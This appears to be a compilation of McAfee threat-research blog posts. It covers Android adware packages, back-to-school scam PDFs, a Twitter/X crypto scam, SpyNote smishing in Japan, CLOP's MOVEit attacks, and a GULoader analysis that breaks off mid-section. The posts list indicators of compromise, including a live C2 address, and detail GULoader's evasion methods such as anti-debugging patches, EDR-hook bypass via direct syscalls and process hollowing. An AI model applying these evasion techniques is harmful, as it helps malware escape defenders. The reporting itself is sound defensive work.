baro.live.tv	바로TV	760aa1a6c0d1e8e4e2d3258e197ce704994b24e8edfd48ef7558454893796ebe	50,000+
baro.onair.media	바로TV	b83a346e18ca20ac5165bc1ce1c8807e89d05abc6a1df0adc3f1f0ad4bb5cd0c	10,000+
kr.baro.dmb	바로TV	84a4426b1f8ea2ddb66f12ef383a0762a011d98ff96c27a0122558babdaf0765	100,000+
kr.live	바로TV	cccfdf95f74add21da546a03c8ec06c7832ba11091c6d491b0aadaf0e2e57bcc	1,000+
newlive.com	바로TV	c76af429fabcfd73066302eeb9dd1235fd181583e6ee9ee9015952e20b4f65bf	50,000+
onair.baro.media	바로TV	6c61059da2ae3a8d130c50295370baad13866d7e5dc847f620ad171cc01a39e9	10,000+
freemusic.ringtone.player	벨소리 무료다운	75c74e204d5695c75209b74b10b3469babec1f7ef84c7a7facb5b5e91be0ae3e	100,000+
com.app.allplayer	실시간 TV	8d881890cfa071f49301cfe9add6442d633c01935811b6caced813de5c6c6534	50,000+
com.onair.shop	실시간 TV	1501dd8267240b0db0ba00e7bde647733230383d6b67678fc6f0c7f3962bd0d3	50,000+
eight.krdmb.onair	실시간 TV	bbd6ddbfee7482fe3fe8b5d96f3be85e09352711a36cd8cf88cfdeaf6ff90c79	10,000+
free.kr	실시간 TV	5f864aa88de07a10045849a7906f616d079eef94cd463e40036760f712361f79	10,000+
kr.dmb.nine	실시간 TV	ea49ad38dd7500a6ac12613afe705eb1a4bcab5bcd77ef24f2b9a480a34e4f46	100,000+
kr.live.com	실시간 TV	f09cff8a05a92ddf388e56ecd66644bf88d826c5b2a4419f371721429c1359a7	10,000+
kr.live.onair	실시간 TV	e8d2068d086d376f1b78d9e510a873ba1abd59703c2267224aa58d3fca2cacbd	100,000+
kr.live.tv	실시간 TV	1b64283e5d7e91cae91643a7dcdde74a188ea8bde1cf745159aac76a3417346e	50,000+
kr.media.onair	실시간 TV	bd0ac9b7717f710e74088df480bde629e54289a61fc23bee60fd0ea560d39952	100,000+
kr.onair.media	실시간 TV	d7dd4766043d4f7f640c7c3fabd08b1a7ccbb93eba88cf766a0de008a569ae4d	1,000+
live.kr.onair	실시간 TV	b84b22bc0146f48982105945bbab233fc21306f0f95503a1f2f578c1149d7e46	10,000+
live.play.com	실시간 TV	516032d21edc2ef4fef389d999df76603538d1bbd9d357a995e3ce4f274a9922	50,000+
new.com	실시간 TV	5d07a113ce389e430bab70a5409f5d7ca261bcdb47e4d8047ae7f3507f044b08	50,000+
newlive.kr	실시간 TV	afc8c1c6f74abfadd8b0490b454eebd7f68c7706a748e4f67acb127ce9772cdb	100,000+
onair.best	실시간 TV	6234eadfe70231972a4c05ff91be016f7c8af1a8b080de0085de046954c9e8e7	50,000+
com.m.music.free	음악다운	ded860430c581628ea5ca81a2f0f0a485cf2eeb9feafe5c6859b9ecc54a964b2	500,000+
good.kr.com	음악다운	bede67693a6c9a51889f949a83ff601b1105c17c0ca5904906373750b3802e91	100,000+
new.music.com	음악다운	fee6cc8b606cf31e55d85a7f0bf7751e700156ce5f7376348e3357d3b4ec0957	1,000+
play.com.apps	음악다운	b2c1caab0e09b4e99d5d5fd403c506d93497ddb2de3e32931237550dbdbe7f06	100,000+
com.alltrot.player	트로트 노래모음	469792f4b9e4320faf0746f09ebbcd8b7cd698a04eef12112d1db03b426ff70c	50,000+
com.trotmusic.player	트로트 노래모음	879014bc1e71d7d14265e57c46c2b26537a81020cc105a030f281b1cc43aeb77	5,000+
best.kr.com	파도 MP3	f2bbe087c3b4902a199710a022adf8b57fd927acac0895ab85cfd3e61c376ea5	100,000+
com.pado.music.mp3	파도 MP3	9c84c91f28eadd0a93ef055809ca3bceb10a283955c9403ef1a39373139d59f2	100,000+

 

 

The post Invisible Adware: Unveiling Ad Fraud Targeting Android Users appeared first on McAfee Blog.

Authored by: Lakshya Mathur and Yashvi Shah 

As the Back-to-School season approaches, scammers are taking advantage of the opportunity to deceive parents and students with various scams. With the increasing popularity of online shopping and digital technology, people are more inclined to make purchases online. Scammers have adapted to this trend and are now using social engineering tactics, such as offering high discounts, free school kits, online lectures, and scholarships, to entice unsuspecting individuals into falling for their schemes. 

McAfee Labs has found the following PDFs targeting back-to-school trends. This blog is a reminder for parents on what to educate their children on and how not to fall victim to such fraud.

Fake captcha PDFs campaign 

McAfee Labs encountered a PDF file campaign featuring a fake CAPTCHA on its first page, to verify human interaction. The second page contained substantial content on back-to-school advice for parents and students, giving the appearance of a legitimate document. These tactics were employed to make the PDF seem authentic, entice consumers to click on the fake CAPTCHA link, and evade detection. 

Figure 1 – Fake CAPTCHA and scammy link 

Figure 2 – PDF Second Page

Figure 3 – Zoomed in content from Figure 2

As shown in Figure 1, there is a fake captcha image that, when clicked, redirects to a URL displayed at the bottom left of the figure. This URL has a Russian domain and goes through multiple redirections before reaching its destination. The scam URL contains the text “all hallows prep school uniform,” and leads to a malicious site that sets cookies, monitors user behavior, and collects interactions, sending the data to servers owned by the domain’s operators. 

Figures 2 and 3 display the second page of the PDF, designed to appear legitimate to users and spam and security scanners. 

In this campaign, we identified a total of 13 domains, with 11 being of Russian origin and 2 from South Africa. You can find the complete list of these domains in the final IOC (Indicators of Compromise) section. 

All domains were created between 2020 and 2021 and use Cloudflare’s name servers. 

Geographical Distribution 

These domains were discovered operating worldwide, targeting consumers across various countries. The United States and India stood out as the top countries where users were most often targeted. 

Figure 4 – Geographical distribution of all the scam domains 

What more to expect? 

As the season begins, the scenario is only the beginning of back-to-school scam season. Parents and students should remain vigilant against fraud, such as: 

• Shopping scams: During back-to-school season, scammers employ various tactics: setting up fake online stores offering discounted school supplies, uniforms, and gadgets, but delivering substandard or nonexistent products; spreading fraudulent social media ads with enticing deals that lead to fake websites collecting personal information and payment details; and sending fake package delivery emails, tricking recipients into clicking on malicious links to perform phishing and malware attacks.  

• Tax/Loan free scams: Scammers target students and parents with student loan forgiveness scams, offering false debt reduction programs in exchange for upfront payments or personal information. They also entice victims with fake scholarships or grants, prompting fees or sensitive data, while no genuine assistance exists. Unsolicited calls from scammers posing as government agencies or loan providers add to the deception, using high-pressure tactics to extract personal information or immediate payments. 

• Identity theft: Scammers employ various identity theft tactics to exploit students and parents: attempting unauthorized access to school databases for personal information, creating fake enrollment forms to collect sensitive data, and sending phishing emails posing as educational institutions or retailers to trick victims into sharing personal information or login credentials. 

• Deepfake AI Voice scams: Scammers might use deepfake AI technology to create convincing voice recordings of school administrators, teachers, or students. They can pose as school officials to deceive parents into making urgent payments or sharing personal information. Additionally, scammers might mimic students’ or teachers’ voices to solicit fraudulent fundraisers for fake school programs or claim that students have won scholarships or prizes to trick them into paying fees or revealing sensitive information. These scams exploit the trust and urgency surrounding back-to-school activities. 

How to Stay Protected? 

• Be skeptical, if something appears to be too good to be true, it probably is.  
• Exercise caution when registering or sharing personal information on questionable sites. 
• Stay informed about these scams to safeguard yourself 
• Maintain a skeptical approach towards unsolicited calls and emails. 
• Keep your anti-virus and web protection up to date and perform regular full scans on your devices. 

IOC (Indicator of Compromise) 

Filetype/URL	Value
PDF	474987c34461cb4bd05b81d040cae468ca5b88e891da4d944191aa819a86ff21
	426ad19eb929d0214254340f3809648cfb0ee612c8374748687f5c119ab1a238
	5cb6ecc4af42075fa822d2888c82feb2053e67f77b3a6a9db6501e5003694aba
Domain	traffine[.]ru
	leonvi[.]ru
	trafffi[.]ru
	norin[.]co[.]za
	gettraff[.]ru
	cctraff[.]ru
	luzas.yubit[.]co[.]za
	ketchas[.]ru
	maypoin[.]ru
	getpdf.pw
	traffset[.]ru
	jottigo[.]ru
	trafffe[.]ru

The post The Season of Back to School Scams appeared first on McAfee Blog.

Authored by: Vallabh Chole and Yerko Grbic

On July 23rd, 2023, Elon Musk announced that the social networking site, Twitter was rebranding as “X”. The news propelled Twitter and X to gain headlines and become the top trending topics on popular social media platforms. 

Scammers pounced on this opportunity and started renaming various hacked YouTube and other social media accounts to “twitter-x” and “twitter fund” to promote scam links with new X branding. 

Figure 1. Twitter-X-themed YouTube Live Stream by scammer 

 

Figure 2. Twitter X Crypto Scam 

 

This type of scam has been active for some time and uses an innovative approach to lure victims. To make this scam more authentic, attackers target famous Influencers with sponsorship emails that contain password-stealing malware as email attachments. When password stealer malware is executed, the influencer’s session cookies (unique access tokens) are stolen and uploaded to attacker-controlled systems. 

Figure 3. Malware Flow Chart  

 

After the influencer’s account has been compromised, the scammer starts to rename channels, in this case to “Twitter CEO” and then the scammers start to live stream an Elon Musk video on YouTube. They post web links for new scam sites in chat, and target YouTube accounts with a large number of subscribers. On other social media platforms, such as Instagram and Twitter, they use compromised accounts to follow users and post screenshots with captions, such as “Thanks Mr.Elon”. If we look for these terms on Instagram, we observe thousands of similar posts. Compromised accounts are also used to post videos for software/game applications, which are malware masquerading as legitimate software or games. These videos demonstrate how to download and execute files, which are common password-stealing malware, and distributed through compromised social media accounts.

Protection with McAfee+: 

 McAfee+ provides all-in-one online protection for your identity, privacy, and security. With McAfee+, you’ll feel safer online because you’ll have the tools, guidance, and support to take the steps to be safer online. McAfee protects against these types of scam sites with Web Advisor protection that detects malicious websites.

Figure 4. McAfee WebAdvisor detection 

 

Below is a detection heatmap for scam URL’s targeting twitter-x and promoting crypto scams.   

Figure 5. Scam URL Detection Heatmap 

 

Figure 6. Password stealer Heatmap 

 

Indicators of Compromise: 

Scam Site	Crypto Type	Wallet
twitter-x[.]org	ETH	0xB1706fc3671115432eC9a997F802aC79CD7f378a
twitter-x[.]org	BTC	1KtgaAjBETdcXiAdGsXJMePT4AEGWqtsug
twitter-x[.]org	USDT	0xB1706fc3671115432eC9a997F802aC79CD7f378a
twitter-x[.]org	DOGE	DLCmD43eZ6hPxZVzc8C7eUL4w8TNrBMw9J

 

The post Scammers Follow the Rebranding of Twitter to X, to Distribute Malware appeared first on McAfee Blog.

Authored by Yukihiro Okutomi 

McAfee’s Mobile team observed a smishing campaign against Japanese Android users posing as a power and water infrastructure company in early June 2023. This campaign ran for a short time from June 7. The SMS message alerts about payment problems to lure victims to a phishing website to infect the target devices with a remote-controlled SpyNote malware. In the past, cybercriminals have often targeted financial institutions. However, on this occasion, public utilities were the target to generate a sense of urgency and push victims to act immediately. Protect your Android and iOS mobile devices with McAfee Mobile Security.

Smishing Attack Campaign 

A phishing SMS message impersonating a power or water supplier claims a payment problem, as shown in the screenshot below. The URL in the message directs the victim to a phishing website to download mobile malware. 

Notice of suspension of power transmission because of non-payment of charges from a power company in Tokyo (Source: Twitter) 

Notice of suspension of water supply because of non-payment of charges from a water company in Tokyo (Source: Twitter) 

 

When accessed with a mobile browser, it will start downloading malware and display a malware installation confirmation dialog. 

The confirmation dialog of Spyware installation via browser (Source: Twitter) 

SpyNote malware 

SpyNote is a known family of malware that proliferated after its source code was leaked in October 2022. Recently, the malware was used in a campaign targeting financial institutions in January and targeting Bank of Japan in April 2023.  

The SpyNote malware is remotely controlled spyware that exploits accessibility services and device administrator privileges. It steals device information and sensitive user information such as device location, contacts, incoming and outgoing SMS messages, and phone calls. The malware deceives users by using legitimate app icons to look real. 

Application Icons disguised by malware. 

After launching the malware, the app opens a fake settings screen and prompts the user to enable the Accessibility feature. When the user clicks the arrow at the bottom of the screen, the system Accessibility service settings screen is displayed. 

A fake setting screen (left), system setting screen (center and right) 

By allowing the Accessibility service, the malware disables battery optimization so that it can run in the background and automatically grants unknown source installation permission to install another malware without the user’s knowledge. In addition to spying on the victim’s device, it also steals two-factor authentication on Google Authenticator and Gmail and Facebook information from the infected device. 

Although the distribution method is different, the step of requesting Accessibility service after launching the app is similar to the case of the Bank of Japan that occurred in April. 

Scammers keep up with current events and attempt to impersonate well-known companies that have a reason to reach out to their customers. The mobile malware attack using SpyNote discovered this time targets mobile apps for life infrastructure such as electricity and water. One of the reasons for this is that electric bills and water bills, which used to be issued on paper, are now managed on the web and mobile app. If you want to learn about smishing, consult this article “What Is Smishing? Here’s How to Spot Fake Texts and Keep Your Info Safe”. McAfee Mobile Security detects this threat as Android/SpyNote and alerts mobile users if it is present and further protects them from any data loss. For more information, visit McAfee Mobile Security. 

Indicators of compromise (IoC) 

C2 Server: 

• 104.233.210.35:27772 

Malware Samples: 

SHA256 Hash	Package name	Application name
075909870a3d16a194e084fbe7a98d2da07c8317fcbfe1f25e5478e585be1954	com.faceai.boot	キャリア安全設定
e2c7d2acb56be38c19980e6e2c91b00a958c93adb37cb19d65400d9912e6333f	com.faceai.boot	東京電力
a532c43202c98f6b37489fb019ebe166ad5f32de5e9b395b3fc41404bf60d734	com.faceai.boot	東京電力TEPCO
cb9e6522755fbf618c57ebb11d88160fb5aeb9ae96c846ed10d6213cdd8a4f5d	com.faceai.boot	東京電力TEPCO
59cdbe8e4d265d7e3f4deec3cf69039143b27c1b594dbe3f0473a1b7f7ade9a6	com.faceai.boot	東京電力TEPCO
8d6e1f448ae3e00c06983471ee26e16f6ab357ee6467b7dce2454fb0814a34d2	com.faceai.boot	東京電力TEPCO
5bdbd8895b9adf39aa8bead0e3587cc786e375ecd2e1519ad5291147a8ca00b6	com.faceai.boot	東京電力TEPCO
a6f9fa36701be31597ad10e1cec51ebf855644b090ed42ed57316c2f0b57ea3c	com.faceai.boot	東京電力TEPCO
f6e2addd189bb534863afeb0d06bcda01d0174f5eac6ee4deeb3d85f35449422	com.faceai.boot	東京電力TEPCO
755585571f47cd71df72af0fad880db5a4d443dacd5ace9cc6ed7a931cb9c21d	com.faceai.boot	東京電力TEPCO
2352887e3fc1e9070850115243fad85c6f1b367d9e645ad8fc7ba28192d6fb85	com.faceai.boot	東京電力TEPCO
90edb28b349db35d32c0190433d3b82949b45e0b1d7f7288c08e56ede81615ba	com.faceai.boot	東京電力TEPCO
513dbe3ff2b4e8caf3a8040f3412620a3627c74a7a79cce7d9fab5e3d08b447b	com.faceai.boot	東京電力TEPCO
f6e2addd189bb534863afeb0d06bcda01d0174f5eac6ee4deeb3d85f35449422	com.faceai.boot	東京電力TEPCO
0fd87da37712e31d39781456c9c1fef48566eee3f616fbcb57a81deb5c66cbc1	com.faceai.boom	東京水道局アプリ
acd36f7e896e3e3806114d397240bd7431fcef9d7f0b268a4e889161e51d802b	com.faceai.boom	東京水道局アプリ
91e2f316871704ad7ef1ec74c84e3e4e41f557269453351771223496d5de594e	com.faceai.boom	東京水道局アプリ

 

 

The post Android SpyNote attacks electric and water public utility users in Japan appeared first on McAfee Blog.

Authored by: Abhishek Karnik and Oliver Devane

You may have heard recently in the news that several organizations, including banks, federal agencies, and corporate entities, have suffered data breaches due to a series of ransomware attacks initiated by the Clop hacker group (aka CLOP, CL0p), that leveraged a vulnerability in MOVEit software.

Three critical vulnerabilities (CVE-2023-34362, CVE-2023-35036 and CVE-2023-35708) have been reported in the software. However, the group is only known to have leveraged one, CVE-2023-34362 to obtain unauthorized access to sensitive data. The vulnerabilities, if exploited, result from a structured query language (SQL) injection attack, that allows attackers access to databases hosted by the MOVEit application. 

SQL injection is a technique by which attackers exploit vulnerabilities that allows the injection of malicious code into an application to view or modify a database (in this case MOVEit) 

Ransomware is a certain class of malware that tries to extort money as a ransom payment. The typical tactics for such malware are: 

1. Encrypt files on a machine and demand payment for file decryption.
2. Siphon important business, confidential or sensitive data, and then demand a payment to prevent public disclosure of such data. 

While there were no reports of file encryption in this wave, the malicious actors stole files from the impacted companies and are now extorting them by demanding payment to prevent the hackers from releasing the files to the public. It should be noted that this is not the first time Clop has used these tactics. 

How did this attack occur and how does this impact you? 

The U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) first warned of this attack via a press release on June 7, 2023. The attackers exploited a zero-day threat in MOVEIt software.  Internet-facing MOVEit transfer web applications were compromised through the vulnerabilities listed above and infected with malware that then subsequently stole data from underlying MOVEit databases. The result was that any file that was transferred using MOVEit could also have been stolen by malicious actors. Once the data was siphoned, the attackers contacted the organizations to inform them that they were victims of an attack and that the files would be published publicly if a ransom wasn’t paid on time.  

The impact of this is that potentially sensitive files that may have contained intellectual property or personally identifiable customer data could be made available on the Internet. This, of course, would have severe ramifications for not only the impacted organizations, but also for customers or users who had provided information to them.  

What can you do? 

If you operate a business that utilizes the MOVEit software, it is imperative that you follow guidance provided by Progress Software and CISA. 

It’s unlikely that individual consumers will be directly impacted by the CLOP malware. However, there is a possibility that you may have been indirectly impacted if an organization you have previously subscribed to or provided information to is a victim. This FAQ and blog by McAfee contains great details on what steps you should follow if your data is part of a data breach.  

Such breaches can also have a ripple effect where malicious actors who weren’t directly involved with the ransomware attack may take advantage of the event, to target potential victims with scams. Be cautious of emails or other correspondence claiming to be from a company that has been impacted by this Ransomware attack. Double-check the email address and verify any links that are present in the emails. Read more about how to recognize and protect yourself from phishing.  

The post CLOP Ransomware exploits MOVEit software appeared first on McAfee Blog.

Authored by: Anandeshwar Unnikrishnan

Stage 1: GULoader Shellcode Deployment 

In recent GULoader campaigns, we are seeing a rise in NSIS-based installers delivered via E-mail as malspam that use plugin libraries to execute the GU shellcode on the victim system. The NSIS scriptable installer is a highly efficient software packaging utility. The installer behavior is dictated by an NSIS script and users can extend the functionality of the packager by adding custom libraries (dll) known as NSIS plugins. Since its inception, adversaries have abused the utility to deliver malware. 

NSIS stands for Nullsoft Scriptable Installer. NSIS installer files are self-contained archives enabling malware authors to include malicious assets along with junk data. The junk data is used as Anti-AV / AV Evasion technique. The image below shows the structure of an NSIS GULoader staging executable archive.

 

The NSIS script, which is a file found in the archive, has a file extension “.nsi” as shown in the image above. The deployment strategy employed by the threat actor can be studied by analyzing the NSIS script commands provided in the script file. The image shown below is an oversimplified view of the whole shellcode staging process. 

The file that holds the encoded GULoader shellcode is dropped on to victim’s disc based on the script configuration along with other data. Junk is appended at the beginning of the encoded shellcode. The encoding style varies from sample to sample. But in all most all the cases, it’s a simple XOR encoding. As mentioned before, the shellcode is appended to junk data, because of this, an offset is used to retrieve encoded GULoader shellcode. In the image, the FileSeek NSIS command is used to do proper offsetting. Some samples have unprotected GULoader shellcode appended to junk data. 

 

A plugin used by the NSIS installer is nothing but a DLL which gets loaded by the installer program at runtime and invokes functions exported by the library.  Two DLL files are dropped in user’s TEMP directory, in all analyzed samples one DLL has a consistent name of system.dll and name of the other one varies.   

The system.dll is responsible for allocating memory for the shellcode and its execution. The following image shows how the NSIS script calls functions in plugin libraries.

 

The system.dll has the following exports as shown the in the image below. The function named “Call” is being used to deploy the shellcode on victim’s system. 

• The Call function exported by system.dll resolves following functions dynamically and execute them to deploy the shellcode. 
• CreateFile – To read the shellcode dumped on to disk by the installer. As part of installer set up, all the files seen in the installer archive earlier are dumped on to disk in new directory created in C:\ drive. 
• VirtualAlloc – To hold the shellcode in the RWX memory. 
• SetFilePointer – To seek the exact position of the shellcode in the dumped file. 
• ReadFile – To read the shellcode.  
• EnumResourceTypesA – Execution via callback mechanism. The second parameter is of the type ENUMRESTYPEPROCA which is simply a pointer to a callback routine. The address where the shellcode is allocated in the memory is passed as the second argument to this API leading to execution of the shellcode. Callback functions parameters are good resources for indirect execution of the code.   

Vectored Exception Handling in GULoader 

The implementation of the exception handling by the Operating System provides an opportunity for the adversary to take over execution flow. The Vectored Exception Handling on Windows provides the user with ability to register custom exception handler, which is simply a code logic that gets executed at the event of an exception. The interesting thing about handling exceptions is that the way in which the system resumes its normal execution flow of the program after the event of exception. Adversaries exploit this mechanism and take ownership of the execution flow. Malware can divert the flow to the code which is under its control when the exception occurs. Normally it is employed by the malware to achieve following goals: 

• Hooking 
• Covert code execution and anti-analysis 

The GuLoader employs the VEH mainly for obfuscating the execution flow and to slow down the analysis. This section will cover the internals of Vectored exception handling on Windows and investigates how GUloader is abusing the VEH mechanism to thwart any analysis efforts.  

• The Vectored Exception Handling (VEH) is an extension of Structured Exception Handling (SEH) with which we can add a vectored exception handler which will be called despite of our position in a call frame, simply put VEH is not frame-based. 
• VEH is abused by malware, either to manipulate the control flow or covertly execute user functions. 
• Windows provides AddVectoredExceptionHandler Win32 API to add custom exception handlers. The function signature is shown below. 

The Handler routine is of the type PVECTORED_EXCEPTION_HANDLER. Further checking the documentation, we can see the handler function takes a pointer to _EXCEPTION_POINTERS type as its input as shown in the image below. 

 

The _EXCEPTION_POINTERS type holds two important structures; PEXCEPTION_RECORD and PCONTEXT. PEXCEPTION_RECORD contains all the information related to exception raised by the system like exception code etc. and PCONTEXT structure holds CPU register (like RIP/EIP, debug registers etc.) values or state of the thread captured when exception occurred. 

 

• This means the exception handler can access both ExceptionRecord and ContextRecord. Here from within the handler one can tamper with the data stored in the ContextRecord, thus manipulating EIP/RIP to control the execution flow when user application resumes from exception handling.    
• There is one interesting thing about exception handling, the execution to the application is given back via NtContinue native routine. Exception dispatch routines call the handler and when handler returns to dispatcher, it passes the ContextRecord to the NtContinue and execution is resumed from the EIP/RIP in the record. On a side note, this is an oversimplified explanation of the whole exception handling process. 

Vectored Handler in GULoader 

• GULoader registers a vectored exception handler via RtlAddVectoredExceptionHandler native routine.  The below image shows the control flow of the handler code. Interestingly most of the code blocks present here are junk added to thwart the analysis efforts.  

 

• The GULoader’s handler implementation is as follows (disregarding the junk code). 
• Reads ExceptionInfo passed to the handler by the system. 
• Reads the ExceptionCode from ExceptionRecord structure. 
• Checks the value of ExceptionCode field against the computed exception codes for STATUS_ACCESS_VIOLATION, STATUS_BREAKPOINT and STATUS_SINGLESTEP. 
• Based on the exception code, malware takes a branch and executes code that modifies the EIP. 

 

 

The GULoader sets the trap flag to trigger single stepping intentionally to detect analysis. The handler code gets executed as discussed before, a block of code is executed based on the exception code. If the exception is single stepping, status code is 0x80000004, following actions take place:

• The GULoader reads the ContextRecord and retrieves EIP value of the thread. 
•  Increments the current EIP by 2 and reads the one byte from there. 
• Performs an XOR on the one-byte data fetched from step before and a static value. The static value changes with samples. In our sample value is 0x1A. 
• The XOR’ed value is then added to the EIP fetched from the ContextRecord. 
• Finally, the modified EIP value from prior step is saved in the ContextRecord and returns the control back to the system(dispatcher). 
• The malware has the same logic for the access violation exception. 

 

• When the shellcode is executed without debugger, INT3 instruction invokes the vectored exception handler routine, with an exception of EXCEPTION_BREAKPOINT, handler computes EIP by incrementing the EIP by 1 and fetching the data from incremented location. Later XORing the fetched data with a constant in our case 0x1A. The result is added to current EIP value. The logic implemented for handling INT3 exceptions also scan the program code for 0xCC instructions put by the researchers. If 0xCC are found that are placed by researchers then EIP is not calculated properly. 

 

EIP Calculation Logic Summary 

Trigger via interrupt instruction (INT3)	eip=((ReadByte(eip+1)^0x1A)+eip)
Trigger via Single Stepping(PUSHFD/POPFD)	eip=((ReadByte(eip+2)^0x1A)+eip)

*The value 0x1A changes with samples 

Detecting Abnormal Execution Flow via VEH 

• The shellcode is structured in such a way that the malware can detect abnormal execution flow by the order in which exception occurred at runtime. The pushfd/popfd instructions are followed by the code that when executed throws STATUS_ACCESS_VIOLATION. When program is executed normally, the execution will not reach the code that follows the pushfd/popfd instruction block, thus raising only STATUS_SINGLESTEP. When accidently stepped over the pushfd/popfd block in debugger, the STATUS_SINGLESTEP is not thrown at the debugger as it suppreses this because the debugger is already single stepping through the code, this is detected by the handler logic when we encounter code that follows the pushfd/popfd instruction block wich throws a STATUS_ACCESS_VIOLATION. Now it runs into a nested exception situation (the access violation followed by suppressed single stepping exception via trap). Because of this, whenever an access violation occurs, the handler routine checks for nested exception information in _EXCEPTION_POINTERS structure as discussed in the beginning. 

Below image shows this the carefully laid out code to detect analysis. 

 

The Egg hunting: VEH Assisted Runtime Padding 

One interesting feature seen in GULoader shellcode in the wild is runtime padding. Runtime padding is an evasive behavior to beat automated scanners and other security checks employed at runtime. It delays the malicious activities performed by the malware on the target system.  

• The egg value in the analyzed sample is 0xAE74B61.  
• It initiates a search for this value in its own data segment of the shellcode. 
• Don’t forget the fact that this is implemented via VEH handler. This search itself adds 0.3 million of VEH iteration on top of regular VEH control manipulation employed in the code. 
• The loader ends this search when it retrieves the address location of the egg value. To make sure the value is not being manipulated by any means by the researcher, it performs two additional checks to validate the egg location. 
• If the check fails, the search continues. The process of retrieving the location of the egg is shown in the image below.  

• As mentioned above, the validity of the egg location is checked by retrieving byte values from two offsets: one is 4 bytes away from the egg location and the value is 0xB8. The other is at 9 bytes from the egg location and the value is 0xC3. This check needs to be passed for the loader to proceed to the next stage of infection. Core malware activities are performed after this runtime padding loop. 

 The following images show the egg location validity checks performed by GULoader. The values 0xB8 and 0xC3 are checked by using proper offsets from the egg location. 

 

Stage 2: Environment Check and Code Injection  

In the second stage of the infection chain, the GULoader performs anti-analysis and code injection. Major anti-analysis vectors are listed below. After making sure that shellcode is not running in a sandbox, it proceeds to conduct code injection into a newly spawned process where stage 3 is initiated to download and deploy actual payload. This payload can be either commodity stealer or RAT.  

Anti-analysis Techniques  

• Employs runtime padding as discussed before. 
• Scans whole process memory for analysis tool specific strings 
• Uses DJB2 hashing for string checks and dynamic API address resolution. 
• Strings are decoded at runtime 
• Checks if qemu is installed on the system by checking the installation path: 
• C:\\Program Files\\qqa\\qqa.exe 
• Patches the following APIs: 
• DbgUIRemoteBreakIn 
• The function’s prologue is patched with ExitProcess call 
• LdrLoadDll 
• The initial bytes are patched with instruction “mov edi edi” 
• DbgBreakPoint 
• Patches with instruction nop 
• Clears hooks placed in ntdll.dll by security products or researcher for the analysis. 
• Window Enumeration via EnumWindows 
• Hides the shellcode thread from the debugger via ZwSetInformationThread by passing 0x11 (ThreadHideFromDebugger) 
• Device driver enumeration via EnumDeviceDrivers andGetDeviceDriverBaseNameA 
• Installed software enumeration via MsiEnumProductsA and MsiGetProductInfoA 
• System service enumeration via OpenSCManagerA and EnumServiceStatusA 
• Checks use of debugging ports by passing ProcessDebugPort (0x7) class to NtQueryInformationProcess 
• Use of CPUID and RDTSC instructions to detect virtual environments and instrumentation. 

Anti-dump Protection 

Whenever GULoader invokes a Win32 api, the call is sandwiched between two XOR loops as shown in the image below.  The loop prior to the call encoded the active shellcode region where the call is taking place to prevent the memory from getting dumped by the security products based on event monitoring or api calls. Following the call, the shellcode region is decoded again back to normal and resumes execution. The XOR key used is a word present in the shellcode itself. 

 

String Decoding  

This section covers the process undertaken by the GUloader to decode the strings at the runtime. 

• The NtAllocateVirtualMemory is called to allocate a buffer to hold the encoded bytes. 
• The encoded bytes are computed by performing various arithmetic and logical operations on static values embedded as operands of assembly instructions. Below image shows the recovery of encoded bytes via various mathematical and logical operations. The EAX points to memory buffer, where computed encoded values get stored. 

 

The first byte/word is reserved to hold the size of the encoded bytes. Below shows a 12 byte long encoded data being written to memory. 

Later, the first word gets replaced by the first word of the actual encoded data. Below image shows the buffer after replacing the first word. 

The encoded data is fully recovered now, and malware proceeds to decode it. For decoding the simple XOR is employed, and key is present in the shellcode. The assembly routine that does the decoding is shown in the image below. Each byte in the buffer is XORed with the key. 

 

The result of the XOR operation is written to same memory buffer that holds the encoded data. A final view of the memory buffer with decoded data is shown below. 

The image shows the decoding the string “psapi.dll”, later this string is used in fetching the addresses of various functions to employ anti-analysis.  

 

The stage 2 culminates in code injection, to be specific GULoader employs a variation of the process hollowing technique, where a benign process is spawned in a suspended state by the malware stager process and proceeds to overwrite the original content present in the suspended process with malicious content, later the state of the thread in the suspended process is changed by modifying processor register values like EIP and finally the process resumes its execution. By controlling EIP, malware can now direct the control flow in the spawned process to a desired code location. After a successful hollowing, the malware code will be running under the cover of a legit application.  

The variation of hollowing technique employed by the GULoader doesn’t replace the file contents, but instead injects the same shellcode and maps the memory in the suspended process. Interestingly, GULoader employs an additional technique if the hollowing attempt fails. More details are covered in the following section.  

Listed below Win32 native APIs are dynamically resolved at runtime to perform the code injection. 

• NtCreateSection 
• ZwMapViewOfSection 
• NtWriteVirtualMemory 
• ZwGetContetThread 
• NtSetContextThread 
• NtResumeThread   

Overview of Code Injection 

• Initially image “%windir%\Microsoft.NET\Framework\version on 32-bit systems\<version>\CasPol.exe” is spawned in suspended mode via CreateProcessInternalW native API. 
• The Gu loader retrieves a handle to the file “C:\Windows\SysWOW64\iertutil.dll” which is used in section creation. The section object created via NtCreateSection will be backed by iertutil.dll.  
• This behavior is mainly to avoid suspicion, a section object which is not backed by any file may draw unwanted attention from security systems.  
• The next phase in the code injection is the mapping of the view created on the section backed by the iertutil.dll into the spawned CasPol.exe process. Once the view is successfully mapped to the process, malware can inject the shellcode in the mapped memory and resume the process thus initiating stage 3. The native api ZwMapViewOfSection is used to perform this task. Following the execution of the above API, the malware checks the result of the function call against the below listed error statuses. 
• C0000018 (STATUS_CONFLICTING_ADDRESS) 
• C0000220 (STATUS_MAPPED_ALIGNMENT) 
• 40000003 (STATUS_IMAGE_NOT_AT_BASE). 
• If the mapping is unsuccessful and status code returned by ZwMapViewOfSection matches with any of the code mentioned above, it has a backup plan. 
• The GuLoader calls NtAllocateVirtualMemory by directly calling the system call stub which is normally found in ntdll.dll library to bypass EDR/AV hooks. The memory is allocated in the remote CasPol.exe process with an RWX memory protection. Following image shows the direct use of NtAllocateVirtualMemory system call. 

After memory allocation, it writes itself into remote process via NtWriteVirtualMemory as discussed above. GULoader shellcodes taken from the field are bigger in size,  samples taken for this analysis are all greater than 20 mb. In samples analyzed, the buffer size allocated to hold the shellcode is 2950000 bytes. The below image shows the GuLoader shellcode in the memory. 

 

Misleading Entry point  

• The GULoader is highly evasive in nature, if abnormal execution flow is detected with help of employed anti-analysis vectors, the EIP and EBX fields of thread context structure (of CasPol.exe process) will be overwritten with a decoy address, which is required for the stage 3 of malware execution. The location ebp+4 is used to hold the entry point despite of the fact whether program is being debugged or not. 
